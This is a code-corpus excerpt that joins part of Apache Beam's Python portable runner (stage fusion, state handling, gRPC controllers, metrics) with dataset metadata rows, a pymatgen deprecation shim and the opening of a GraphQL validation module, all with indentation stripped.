grouping_buffer = create_buffer_id(stage.name, kind='group')
if stage.name not in pipeline_components.transforms:
pipeline_components.transforms[stage.name].CopyFrom(transform)
gbk_write = Stage(
transform.unique_name + '/Write',
[beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Write',
inputs=transform.inputs,
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_OUTPUT_URN,
payload=grouping_buffer))],
downstream_side_inputs=frozenset(),
must_follow=stage.must_follow)
yield gbk_write
yield Stage(
transform.unique_name + '/Read',
[beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Read',
outputs=transform.outputs,
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_INPUT_URN,
payload=grouping_buffer))],
downstream_side_inputs=stage.downstream_side_inputs,
must_follow=union(frozenset([gbk_write]), stage.must_follow))
else:
yield stage
def sink_flattens(stages):
"""Sink flattens and remove them from the graph.
A flatten that cannot be sunk/fused away becomes multiple writes (to the
same logical sink) followed by a read.
"""
# TODO(robertwb): Actually attempt to sink rather than always materialize.
# TODO(robertwb): Possibly fuse this into one of the stages.
pcollections = pipeline_components.pcollections
for stage in stages:
assert len(stage.transforms) == 1
transform = stage.transforms[0]
if transform.spec.urn == common_urns.primitives.FLATTEN.urn:
# This is used later to correlate the read and writes.
buffer_id = create_buffer_id(transform.unique_name)
output_pcoll_id, = list(transform.outputs.values())
output_coder_id = pcollections[output_pcoll_id].coder_id
flatten_writes = []
for local_in, pcoll_in in transform.inputs.items():
if pcollections[pcoll_in].coder_id != output_coder_id:
# Flatten inputs must all be written with the same coder as is
# used to read them.
pcollections[pcoll_in].coder_id = output_coder_id
transcoded_pcollection = (
transform.unique_name + '/Transcode/' + local_in + '/out')
yield Stage(
transform.unique_name + '/Transcode/' + local_in,
[beam_runner_api_pb2.PTransform(
unique_name=
transform.unique_name + '/Transcode/' + local_in,
inputs={local_in: pcoll_in},
outputs={'out': transcoded_pcollection},
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.IDENTITY_DOFN_URN))],
downstream_side_inputs=frozenset(),
must_follow=stage.must_follow)
pcollections[transcoded_pcollection].CopyFrom(
pcollections[pcoll_in])
pcollections[transcoded_pcollection].coder_id = output_coder_id
else:
transcoded_pcollection = pcoll_in
flatten_write = Stage(
transform.unique_name + '/Write/' + local_in,
[beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Write/' + local_in,
inputs={local_in: transcoded_pcollection},
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_OUTPUT_URN,
payload=buffer_id))],
downstream_side_inputs=frozenset(),
must_follow=stage.must_follow)
flatten_writes.append(flatten_write)
yield flatten_write
yield Stage(
transform.unique_name + '/Read',
[beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Read',
outputs=transform.outputs,
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_INPUT_URN,
payload=buffer_id))],
downstream_side_inputs=stage.downstream_side_inputs,
must_follow=union(frozenset(flatten_writes), stage.must_follow))
else:
yield stage
def annotate_downstream_side_inputs(stages):
"""Annotate each stage with fusion-prohibiting information.
Each stage is annotated with the (transitive) set of pcollections that
depend on this stage that are also used later in the pipeline as a
side input.
While theoretically this could result in O(n^2) annotations, the size of
each set is bounded by the number of side inputs (typically much smaller
than the number of total nodes) and the number of *distinct* side-input
sets is also generally small (and shared due to the use of union
defined above).
This representation is also amenable to simple recomputation on fusion.
"""
consumers = collections.defaultdict(list)
all_side_inputs = set()
for stage in stages:
for transform in stage.transforms:
for input in transform.inputs.values():
consumers[input].append(stage)
for si in stage.side_inputs():
all_side_inputs.add(si)
all_side_inputs = frozenset(all_side_inputs)
downstream_side_inputs_by_stage = {}
def compute_downstream_side_inputs(stage):
if stage not in downstream_side_inputs_by_stage:
downstream_side_inputs = frozenset()
for transform in stage.transforms:
for output in transform.outputs.values():
if output in all_side_inputs:
downstream_side_inputs = union(
downstream_side_inputs, frozenset([output]))
for consumer in consumers[output]:
downstream_side_inputs = union(
downstream_side_inputs,
compute_downstream_side_inputs(consumer))
downstream_side_inputs_by_stage[stage] = downstream_side_inputs
return downstream_side_inputs_by_stage[stage]
for stage in stages:
stage.downstream_side_inputs = compute_downstream_side_inputs(stage)
return stages
def fix_side_input_pcoll_coders(stages):
"""Length prefix side input PCollection coders.
"""
for stage in stages:
for si in stage.side_inputs():
length_prefix_unknown_coders(
pipeline_components.pcollections[si], pipeline_components)
return stages
def greedily_fuse(stages):
"""Places transforms sharing an edge in the same stage, whenever possible.
"""
producers_by_pcoll = {}
consumers_by_pcoll = collections.defaultdict(list)
# Used to always reference the correct stage as the producer and
# consumer maps are not updated when stages are fused away.
replacements = {}
def replacement(s):
old_ss = []
while s in replacements:
old_ss.append(s)
s = replacements[s]
for old_s in old_ss[:-1]:
replacements[old_s] = s
return s
def fuse(producer, consumer):
fused = producer.fuse(consumer)
replacements[producer] = fused
replacements[consumer] = fused
# First record the producers and consumers of each PCollection.
for stage in stages:
for transform in stage.transforms:
for input in transform.inputs.values():
consumers_by_pcoll[input].append(stage)
for output in transform.outputs.values():
producers_by_pcoll[output] = stage
logging.debug('consumers\n%s', consumers_by_pcoll)
logging.debug('producers\n%s', producers_by_pcoll)
# Now try to fuse away all pcollections.
for pcoll, producer in producers_by_pcoll.items():
write_pcoll = None
for consumer in consumers_by_pcoll[pcoll]:
producer = replacement(producer)
consumer = replacement(consumer)
# Update consumer.must_follow set, as it's used in can_fuse.
consumer.must_follow = frozenset(
replacement(s) for s in consumer.must_follow)
if producer.can_fuse(consumer):
fuse(producer, consumer)
else:
# If we can't fuse, do a read + write.
buffer_id = create_buffer_id(pcoll)
if write_pcoll is None:
write_pcoll = Stage(
pcoll + '/Write',
[beam_runner_api_pb2.PTransform(
unique_name=pcoll + '/Write',
inputs={'in': pcoll},
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_OUTPUT_URN,
payload=buffer_id))])
fuse(producer, write_pcoll)
if consumer.has_as_main_input(pcoll):
read_pcoll = Stage(
pcoll + '/Read',
[beam_runner_api_pb2.PTransform(
unique_name=pcoll + '/Read',
outputs={'out': pcoll},
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_INPUT_URN,
payload=buffer_id))],
must_follow=frozenset([write_pcoll]))
fuse(read_pcoll, consumer)
else:
consumer.must_follow = union(
consumer.must_follow, frozenset([write_pcoll]))
# Everything that was originally a stage or a replacement, but wasn't
# replaced, should be in the final graph.
final_stages = frozenset(stages).union(list(replacements.values()))\
.difference(list(replacements))
for stage in final_stages:
# Update all references to their final values before throwing
# the replacement data away.
stage.must_follow = frozenset(replacement(s) for s in stage.must_follow)
# Two reads of the same stage may have been fused. This is unneeded.
stage.deduplicate_read()
return final_stages
def inject_timer_pcollections(stages):
for stage in stages:
for transform in list(stage.transforms):
if transform.spec.urn == common_urns.primitives.PAR_DO.urn:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for tag, spec in payload.timer_specs.items():
if len(transform.inputs) > 1:
raise NotImplementedError('Timers and side inputs.')
input_pcoll = pipeline_components.pcollections[
next(iter(transform.inputs.values()))]
# Create the appropriate coder for the timer PCollection.
key_coder_id = input_pcoll.coder_id
if (pipeline_components.coders[key_coder_id].spec.spec.urn
== common_urns.coders.WINDOWED_VALUE.urn):
key_coder_id = pipeline_components.coders[
key_coder_id].component_coder_ids[0]
if (pipeline_components.coders[key_coder_id].spec.spec.urn
== common_urns.coders.KV.urn):
key_coder_id = pipeline_components.coders[
key_coder_id].component_coder_ids[0]
key_timer_coder_id = add_or_get_coder_id(
beam_runner_api_pb2.Coder(
spec=beam_runner_api_pb2.SdkFunctionSpec(
spec=beam_runner_api_pb2.FunctionSpec(
urn=common_urns.coders.KV.urn)),
component_coder_ids=[key_coder_id, spec.timer_coder_id]))
timer_pcoll_coder_id = windowed_coder_id(
key_timer_coder_id,
pipeline_components.windowing_strategies[
input_pcoll.windowing_strategy_id].window_coder_id)
# Inject the read and write pcollections.
timer_read_pcoll = unique_name(
pipeline_components.pcollections,
'%s_timers_to_read_%s' % (transform.unique_name, tag))
timer_write_pcoll = unique_name(
pipeline_components.pcollections,
'%s_timers_to_write_%s' % (transform.unique_name, tag))
pipeline_components.pcollections[timer_read_pcoll].CopyFrom(
beam_runner_api_pb2.PCollection(
unique_name=timer_read_pcoll,
coder_id=timer_pcoll_coder_id,
windowing_strategy_id=input_pcoll.windowing_strategy_id,
is_bounded=input_pcoll.is_bounded))
pipeline_components.pcollections[timer_write_pcoll].CopyFrom(
beam_runner_api_pb2.PCollection(
unique_name=timer_write_pcoll,
coder_id=timer_pcoll_coder_id,
windowing_strategy_id=input_pcoll.windowing_strategy_id,
is_bounded=input_pcoll.is_bounded))
stage.transforms.append(
beam_runner_api_pb2.PTransform(
unique_name=timer_read_pcoll + '/Read',
outputs={'out': timer_read_pcoll},
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_INPUT_URN,
payload=create_buffer_id(
timer_read_pcoll, kind='timers'))))
stage.transforms.append(
beam_runner_api_pb2.PTransform(
unique_name=timer_write_pcoll + '/Write',
inputs={'in': timer_write_pcoll},
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_OUTPUT_URN,
payload=create_buffer_id(
timer_write_pcoll, kind='timers'))))
assert tag not in transform.inputs
transform.inputs[tag] = timer_read_pcoll
assert tag not in transform.outputs
transform.outputs[tag] = timer_write_pcoll
stage.timer_pcollections.append(
(timer_read_pcoll + '/Read', timer_write_pcoll))
yield stage
def sort_stages(stages):
"""Order stages suitable for sequential execution.
"""
seen = set()
ordered = []
def process(stage):
if stage not in seen:
seen.add(stage)
for prev in stage.must_follow:
process(prev)
ordered.append(stage)
for stage in stages:
process(stage)
return ordered
# Now actually apply the operations.
pipeline_components = copy.deepcopy(pipeline_proto.components)
# Some SDK workers require windowed coders for their PCollections.
# TODO(BEAM-4150): Consistently use unwindowed coders everywhere.
for pcoll in pipeline_components.pcollections.values():
if (pipeline_components.coders[pcoll.coder_id].spec.spec.urn
!= common_urns.coders.WINDOWED_VALUE.urn):
pcoll.coder_id = windowed_coder_id(
pcoll.coder_id,
pipeline_components.windowing_strategies[
pcoll.windowing_strategy_id].window_coder_id)
known_composites = set(
[common_urns.primitives.GROUP_BY_KEY.urn,
common_urns.composites.COMBINE_PER_KEY.urn])
def leaf_transforms(root_ids):
for root_id in root_ids:
root = pipeline_proto.components.transforms[root_id]
if root.spec.urn in known_composites:
yield root_id
elif not root.subtransforms:
# Make sure its outputs are not a subset of its inputs.
if set(root.outputs.values()) - set(root.inputs.values()):
yield root_id
else:
for leaf in leaf_transforms(root.subtransforms):
yield leaf
# Initial set of stages are singleton leaf transforms.
stages = [
Stage(name, [pipeline_proto.components.transforms[name]])
for name in leaf_transforms(pipeline_proto.root_transform_ids)]
# Apply each phase in order.
for phase in [
annotate_downstream_side_inputs, fix_side_input_pcoll_coders,
lift_combiners, expand_gbk, sink_flattens, greedily_fuse,
impulse_to_input, inject_timer_pcollections, sort_stages]:
logging.info('%s %s %s', '=' * 20, phase, '=' * 20)
stages = list(phase(stages))
logging.debug('Stages: %s', [str(s) for s in stages])
# Return the (possibly mutated) context and ordered set of stages.
return pipeline_components, stages, safe_coders
def run_stages(self, pipeline_components, stages, safe_coders):
if self._use_grpc:
controller = FnApiRunner.GrpcController(self._sdk_harness_factory)
else:
controller = FnApiRunner.DirectController()
metrics_by_stage = {}
monitoring_infos_by_stage = {}
try:
with self.maybe_profile():
pcoll_buffers = collections.defaultdict(list)
for stage in stages:
stage_results = self.run_stage(
controller, pipeline_components, stage,
pcoll_buffers, safe_coders)
metrics_by_stage[stage.name] = stage_results.process_bundle.metrics
monitoring_infos_by_stage[stage.name] = (
stage_results.process_bundle.monitoring_infos)
finally:
controller.close()
return RunnerResult(
runner.PipelineState.DONE, monitoring_infos_by_stage, metrics_by_stage)
def run_stage(
self, controller, pipeline_components, stage, pcoll_buffers, safe_coders):
context = pipeline_context.PipelineContext(pipeline_components)
data_api_service_descriptor = controller.data_api_service_descriptor()
def extract_endpoints(stage):
# Returns maps of transform names to PCollection identifiers.
# Also mutates IO stages to point to the data ApiServiceDescriptor.
data_input = {}
data_side_input = {}
data_output = {}
for transform in stage.transforms:
if transform.spec.urn in (bundle_processor.DATA_INPUT_URN,
bundle_processor.DATA_OUTPUT_URN):
pcoll_id = transform.spec.payload
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
target = transform.unique_name, only_element(transform.outputs)
if pcoll_id == IMPULSE_BUFFER:
data_input[target] = [ENCODED_IMPULSE_VALUE]
else:
data_input[target] = pcoll_buffers[pcoll_id]
coder_id = pipeline_components.pcollections[
only_element(transform.outputs.values())].coder_id
elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN:
target = transform.unique_name, only_element(transform.inputs)
data_output[target] = pcoll_id
coder_id = pipeline_components.pcollections[
only_element(transform.inputs.values())].coder_id
else:
raise NotImplementedError
data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id)
if data_api_service_descriptor:
data_spec.api_service_descriptor.url = (
data_api_service_descriptor.url)
transform.spec.payload = data_spec.SerializeToString()
elif transform.spec.urn == common_urns.primitives.PAR_DO.urn:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for tag, si in payload.side_inputs.items():
data_side_input[transform.unique_name, tag] = (
create_buffer_id(transform.inputs[tag]),
beam.pvalue.SideInputData.from_runner_api(si, context))
return data_input, data_side_input, data_output
logging.info('Running %s', stage.name)
logging.debug(' %s', stage)
data_input, data_side_input, data_output = extract_endpoints(stage)
process_bundle_descriptor = beam_fn_api_pb2.ProcessBundleDescriptor(
id=self._next_uid(),
transforms={transform.unique_name: transform
for transform in stage.transforms},
pcollections=dict(pipeline_components.pcollections.items()),
coders=dict(pipeline_components.coders.items()),
windowing_strategies=dict(
pipeline_components.windowing_strategies.items()),
environments=dict(pipeline_components.environments.items()))
if controller.state_api_service_descriptor():
process_bundle_descriptor.state_api_service_descriptor.url = (
controller.state_api_service_descriptor().url)
# Store the required side inputs into state.
for (transform_id, tag), (buffer_id, si) in data_side_input.items():
_, pcoll_id = split_buffer_id(buffer_id)
value_coder = context.coders[safe_coders[
pipeline_components.pcollections[pcoll_id].coder_id]]
elements_by_window = _WindowGroupingBuffer(si, value_coder)
for element_data in pcoll_buffers[buffer_id]:
elements_by_window.append(element_data)
for key, window, elements_data in elements_by_window.encoded_items():
state_key = beam_fn_api_pb2.StateKey(
multimap_side_input=beam_fn_api_pb2.StateKey.MultimapSideInput(
ptransform_id=transform_id,
side_input_id=tag,
window=window,
key=key))
controller.state_handler.blocking_append(state_key, elements_data)
def get_buffer(buffer_id):
kind, name = split_buffer_id(buffer_id)
if kind in ('materialize', 'timers'):
if buffer_id not in pcoll_buffers:
# Just store the data chunks for replay.
pcoll_buffers[buffer_id] = list()
elif kind == 'group':
# This is a grouping write, create a grouping buffer if needed.
if buffer_id not in pcoll_buffers:
original_gbk_transform = name
transform_proto = pipeline_components.transforms[
original_gbk_transform]
input_pcoll = only_element(list(transform_proto.inputs.values()))
output_pcoll = only_element(list(transform_proto.outputs.values()))
pre_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[input_pcoll].coder_id]]
post_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[output_pcoll].coder_id]]
windowing_strategy = context.windowing_strategies[
pipeline_components
.pcollections[output_pcoll].windowing_strategy_id]
pcoll_buffers[buffer_id] = _GroupingBuffer(
pre_gbk_coder, post_gbk_coder, windowing_strategy)
else:
# These should be the only two identifiers we produce for now,
# but special side input writes may go here.
raise NotImplementedError(buffer_id)
return pcoll_buffers[buffer_id]
for k in range(self._bundle_repeat):
try:
controller.state_handler.checkpoint()
BundleManager(
controller, lambda pcoll_id: [], process_bundle_descriptor,
self._progress_frequency, k).process_bundle(data_input, data_output)
finally:
controller.state_handler.restore()
result = BundleManager(
controller, get_buffer, process_bundle_descriptor,
self._progress_frequency).process_bundle(data_input, data_output)
while True:
timer_inputs = {}
for transform_id, timer_writes in stage.timer_pcollections:
windowed_timer_coder_impl = context.coders[
pipeline_components.pcollections[timer_writes].coder_id].get_impl()
written_timers = get_buffer(
create_buffer_id(timer_writes, kind='timers'))
if written_timers:
# Keep only the "last" timer set per key and window.
timers_by_key_and_window = {}
for elements_data in written_timers:
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_key_timer = windowed_timer_coder_impl.decode_from_stream(
input_stream, True)
key, _ = windowed_key_timer.value
# TODO: Explode and merge windows.
assert len(windowed_key_timer.windows) == 1
timers_by_key_and_window[
key, windowed_key_timer.windows[0]] = windowed_key_timer
out = create_OutputStream()
for windowed_key_timer in timers_by_key_and_window.values():
windowed_timer_coder_impl.encode_to_stream(
windowed_key_timer, out, True)
timer_inputs[transform_id, 'out'] = [out.get()]
written_timers[:] = []
if timer_inputs:
# The worker will be waiting on these inputs as well.
for other_input in data_input:
if other_input not in timer_inputs:
timer_inputs[other_input] = []
# TODO(robertwb): merge results
BundleManager(
controller,
get_buffer,
process_bundle_descriptor,
self._progress_frequency,
True).process_bundle(timer_inputs, data_output)
else:
break
return result
# These classes are used to interact with the worker.
class StateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
class CopyOnWriteState(object):
def __init__(self, underlying):
self._underlying = underlying
self._overlay = {}
def __getitem__(self, key):
if key in self._overlay:
return self._overlay[key]
else:
return FnApiRunner.StateServicer.CopyOnWriteList(
self._underlying, self._overlay, key)
def __delitem__(self, key):
self._overlay[key] = []
def commit(self):
self._underlying.update(self._overlay)
return self._underlying
class CopyOnWriteList(object):
def __init__(self, underlying, overlay, key):
self._underlying = underlying
self._overlay = overlay
self._key = key
def __iter__(self):
if self._key in self._overlay:
return iter(self._overlay[self._key])
else:
return iter(self._underlying[self._key])
def append(self, item):
if self._key not in self._overlay:
self._overlay[self._key] = list(self._underlying[self._key])
self._overlay[self._key].append(item)
def __init__(self):
self._lock = threading.Lock()
self._state = collections.defaultdict(list)
self._checkpoint = None
def checkpoint(self):
assert self._checkpoint is None
self._checkpoint = self._state
self._state = FnApiRunner.StateServicer.CopyOnWriteState(self._state)
def commit(self):
self._state.commit()
self._state = self._checkpoint.commit()
self._checkpoint = None
def restore(self):
self._state = self._checkpoint
self._checkpoint = None
@contextlib.contextmanager
def process_instruction_id(self, unused_instruction_id):
yield
def blocking_get(self, state_key):
with self._lock:
return b''.join(self._state[self._to_key(state_key)])
def blocking_append(self, state_key, data):
with self._lock:
self._state[self._to_key(state_key)].append(data)
def blocking_clear(self, state_key):
with self._lock:
del self._state[self._to_key(state_key)]
@staticmethod
def _to_key(state_key):
return state_key.SerializeToString()
class GrpcStateServicer(
StateServicer, beam_fn_api_pb2_grpc.BeamFnStateServicer):
def State(self, request_stream, context=None):
# Note that this eagerly mutates state, assuming any failures are fatal.
# Thus it is safe to ignore instruction_reference.
for request in request_stream:
request_type = request.WhichOneof('request')
if request_type == 'get':
yield beam_fn_api_pb2.StateResponse(
id=request.id,
get=beam_fn_api_pb2.StateGetResponse(
data=self.blocking_get(request.state_key)))
elif request_type == 'append':
self.blocking_append(request.state_key, request.append.data)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
append=beam_fn_api_pb2.StateAppendResponse())
elif request_type == 'clear':
self.blocking_clear(request.state_key)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
clear=beam_fn_api_pb2.StateClearResponse())
else:
raise NotImplementedError('Unknown state request: %s' % request_type)
class SingletonStateHandlerFactory(sdk_worker.StateHandlerFactory):
"""A singleton cache for a StateServicer."""
def __init__(self, state_handler):
self._state_handler = state_handler
def create_state_handler(self, api_service_descriptor):
"""Returns the singleton state handler."""
return self._state_handler
def close(self):
"""Does nothing."""
pass
class DirectController(object):
"""An in-memory controller for fn API control, state and data planes."""
def __init__(self):
self.control_handler = self
self.data_plane_handler = data_plane.InMemoryDataChannel()
self.state_handler = FnApiRunner.StateServicer()
self.worker = sdk_worker.SdkWorker(
FnApiRunner.SingletonStateHandlerFactory(self.state_handler),
data_plane.InMemoryDataChannelFactory(
self.data_plane_handler.inverse()), {})
self._uid_counter = 0
def push(self, request):
if not request.instruction_id:
self._uid_counter += 1
request.instruction_id = 'control_%s' % self._uid_counter
logging.debug('CONTROL REQUEST %s', request)
response = self.worker.do_instruction(request)
logging.debug('CONTROL RESPONSE %s', response)
return ControlFuture(request.instruction_id, response)
def done(self):
pass
def close(self):
pass
def data_api_service_descriptor(self):
return None
def state_api_service_descriptor(self):
return None
class GrpcController(object):
"""An grpc based controller for fn API control, state and data planes."""
def __init__(self, sdk_harness_factory=None):
self.sdk_harness_factory = sdk_harness_factory
self.control_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=10))
self.control_port = self.control_server.add_insecure_port('[::]:0')
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size
# is controlled in a layer above.
no_max_message_sizes = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
self.data_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=10),
options=no_max_message_sizes)
self.data_port = self.data_server.add_insecure_port('[::]:0')
self.state_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=10),
options=no_max_message_sizes)
self.state_port = self.state_server.add_insecure_port('[::]:0')
self.control_handler = BeamFnControlServicer()
beam_fn_api_pb2_grpc.add_BeamFnControlServicer_to_server(
self.control_handler, self.control_server)
self.data_plane_handler = data_plane.GrpcServerDataChannel()
beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server(
self.data_plane_handler, self.data_server)
self.state_handler = FnApiRunner.GrpcStateServicer()
beam_fn_api_pb2_grpc.add_BeamFnStateServicer_to_server(
self.state_handler, self.state_server)
logging.info('starting control server on port %s', self.control_port)
logging.info('starting data server on port %s', self.data_port)
self.state_server.start()
self.data_server.start()
self.control_server.start()
self.worker = self.sdk_harness_factory(
'localhost:%s' % self.control_port
) if self.sdk_harness_factory else sdk_worker.SdkHarness(
'localhost:%s' % self.control_port, worker_count=1)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
logging.info('starting worker')
self.worker_thread.start()
def data_api_service_descriptor(self):
url = 'localhost:%s' % self.data_port
api_service_descriptor = endpoints_pb2.ApiServiceDescriptor()
api_service_descriptor.url = url
return api_service_descriptor
def state_api_service_descriptor(self):
url = 'localhost:%s' % self.state_port
api_service_descriptor = endpoints_pb2.ApiServiceDescriptor()
api_service_descriptor.url = url
return api_service_descriptor
def close(self):
self.control_handler.done()
self.worker_thread.join()
self.data_plane_handler.close()
self.control_server.stop(5).wait()
self.data_server.stop(5).wait()
self.state_server.stop(5).wait()
class BundleManager(object):
_uid_counter = 0
def __init__(
self, controller, get_buffer, bundle_descriptor, progress_frequency=None,
skip_registration=False):
self._controller = controller
self._get_buffer = get_buffer
self._bundle_descriptor = bundle_descriptor
self._registered = skip_registration
self._progress_frequency = progress_frequency
def process_bundle(self, inputs, expected_outputs):
# Unique id for the instruction processing this bundle.
BundleManager._uid_counter += 1
process_bundle_id = 'bundle_%s' % BundleManager._uid_counter
# Register the bundle descriptor, if needed.
if not self._registered:
process_bundle_registration = beam_fn_api_pb2.InstructionRequest(
register=beam_fn_api_pb2.RegisterRequest(
process_bundle_descriptor=[self._bundle_descriptor]))
self._controller.control_handler.push(process_bundle_registration)
self._registered = True
# Write all the input data to the channel.
for (transform_id, name), elements in inputs.items():
data_out = self._controller.data_plane_handler.output_stream(
process_bundle_id, beam_fn_api_pb2.Target(
primitive_transform_reference=transform_id, name=name))
for element_data in elements:
data_out.write(element_data)
data_out.close()
# Actually start the bundle.
process_bundle = beam_fn_api_pb2.InstructionRequest(
instruction_id=process_bundle_id,
process_bundle=beam_fn_api_pb2.ProcessBundleRequest(
process_bundle_descriptor_reference=self._bundle_descriptor.id))
result_future = self._controller.control_handler.push(process_bundle)
with ProgressRequester(
self._controller, process_bundle_id, self._progress_frequency):
# Gather all output data.
expected_targets = [
beam_fn_api_pb2.Target(primitive_transform_reference=transform_id,
name=output_name)
for (transform_id, output_name), _ in expected_outputs.items()]
logging.debug('Gather all output data from %s.', expected_targets)
for output in self._controller.data_plane_handler.input_elements(
process_bundle_id, expected_targets):
target_tuple = (
output.target.primitive_transform_reference, output.target.name)
if target_tuple in expected_outputs:
self._get_buffer(expected_outputs[target_tuple]).append(output.data)
logging.debug('Wait for the bundle to finish.')
result = result_future.get()
if result.error:
raise RuntimeError(result.error)
return result
class ProgressRequester(threading.Thread):
def __init__(self, controller, instruction_id, frequency, callback=None):
super(ProgressRequester, self).__init__()
self._controller = controller
self._instruction_id = instruction_id
self._frequency = frequency
self._done = False
self._latest_progress = None
self._callback = callback
self.daemon = True
def __enter__(self):
if self._frequency:
self.start()
def __exit__(self, *unused_exc_info):
if self._frequency:
self.stop()
def run(self):
while not self._done:
try:
progress_result = self._controller.control_handler.push(
beam_fn_api_pb2.InstructionRequest(
process_bundle_progress=
beam_fn_api_pb2.ProcessBundleProgressRequest(
instruction_reference=self._instruction_id))).get()
self._latest_progress = progress_result.process_bundle_progress
if self._callback:
self._callback(self._latest_progress)
except Exception as exn:
logging.error("Bad progress: %s", exn)
time.sleep(self._frequency)
def stop(self):
self._done = True
class ControlFuture(object):
def __init__(self, instruction_id, response=None):
self.instruction_id = instruction_id
if response:
self._response = response
else:
self._response = None
self._condition = threading.Condition()
def set(self, response):
with self._condition:
self._response = response
self._condition.notify_all()
def get(self, timeout=None):
if not self._response:
with self._condition:
if not self._response:
self._condition.wait(timeout)
return self._response
class FnApiMetrics(metrics.metric.MetricResults):
def __init__(self, step_monitoring_infos, user_metrics_only=True):
"""Used for querying metrics from the PipelineResult object.
step_monitoring_infos: Per step metrics specified as MonitoringInfos.
use_monitoring_infos: If true, return the metrics based on the
step_monitoring_infos.
"""
self._counters = {}
self._distributions = {}
self._gauges = {}
self._user_metrics_only = user_metrics_only
self._init_metrics_from_monitoring_infos(step_monitoring_infos)
def _init_metrics_from_monitoring_infos(self, step_monitoring_infos):
for smi in step_monitoring_infos.values():
# Only include user metrics.
for mi in smi:
if (self._user_metrics_only and
not monitoring_infos.is_user_monitoring_info(mi)):
continue
key = self._to_metric_key(mi)
if monitoring_infos.is_counter(mi):
self._counters[key] = (
monitoring_infos.extract_metric_result_map_value(mi))
elif monitoring_infos.is_distribution(mi):
self._distributions[key] = (
monitoring_infos.extract_metric_result_map_value(mi))
elif monitoring_infos.is_gauge(mi):
self._gauges[key] = (
monitoring_infos.extract_metric_result_map_value(mi))
def _to_metric_key(self, monitoring_info):
# Right now this assumes that all metrics have a PTRANSFORM
ptransform_id = monitoring_info.labels['PTRANSFORM']
namespace, name = monitoring_infos.parse_namespace_and_name(monitoring_info)
return MetricKey(
ptransform_id, metrics.metricbase.MetricName(namespace, name))
def query(self, filter=None):
counters = [metrics.execution.MetricResult(k, v, v)
for k, v in self._counters.items()
if self.matches(filter, k)]
distributions = [metrics.execution.MetricResult(k, v, v)
for k, v in self._distributions.items()
if self.matches(filter, k)]
gauges = [metrics.execution.MetricResult(k, v, v)
for k, v in self._gauges.items()
if self.matches(filter, k)]
return {self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges}
class RunnerResult(runner.PipelineResult):
def __init__(self, state, monitoring_infos_by_stage, metrics_by_stage):
super(RunnerResult, self).__init__(state)
self._monitoring_infos_by_stage = monitoring_infos_by_stage
self._metrics_by_stage = metrics_by_stage
self._metrics = None
self._monitoring_metrics = None
def wait_until_finish(self, duration=None):
return self._state
def metrics(self):
"""Returns a queryable oject including user metrics only."""
if self._metrics is None:
self._metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=True)
return self._metrics
def monitoring_metrics(self):
"""Returns a queryable object including all metrics."""
if self._monitoring_metrics is None:
self._monitoring_metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=False)
return self._monitoring_metrics
def only_element(iterable):
element, = iterable
return element
def unique_name(existing, prefix):
if prefix in existing:
counter = 0
while True:
counter += 1
prefix_counter = prefix + "_%s" % counter
if prefix_counter not in existing:
return prefix_counter
else:
return prefix
def create_buffer_id(name, kind='materialize'):
return ('%s:%s' % (kind, name)).encode('utf-8')
def split_buffer_id(buffer_id):
return buffer_id.decode('utf-8').split(':', 1)
|
charlesccychen/beam
|
sdks/python/apache_beam/runners/portability/fn_api_runner.py
|
Python
|
apache-2.0
| 70,063
|
[
"VisIt"
] |
b9df03e3f65ede93640782f9baa9e91cf48e6a3eedb17d4b723b2d1d1ff07216
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
import warnings
warnings.warn("pymatgen.analysis.elasticity.tensors has been moved to "
"pymatgen.core.tensors, please update dependencies accordingly. "
"Links will removed in v2019.1.1.")
from pymatgen.core.tensors import *
|
dongsenfo/pymatgen
|
pymatgen/analysis/elasticity/tensors.py
|
Python
|
mit
| 366
|
[
"pymatgen"
] |
13fdfc2e47628b663aad41c8e94eb40c192f527bf4d5e388984803dc8bc01f74
|
from ..error import GraphQLError
from ..language.ast import FragmentDefinition, FragmentSpread
from ..language.visitor import Visitor, visit
from ..utils import TypeInfo
from ..type import GraphQLSchema
from . import rules as Rules
specified_rules = [
Rules.UniqueOperationNames,
Rules.LoneAnonymousOperation,
Rules.KnownTypeNames,
Rules.FragmentsOnCompositeTypes,
Rules.VariablesAreInputTypes,
Rules.ScalarLeafs,
Rules.FieldsOnCorrectType,
Rules.UniqueFragmentNames,
Rules.KnownFragmentNames,
Rules.NoUnusedFragments,
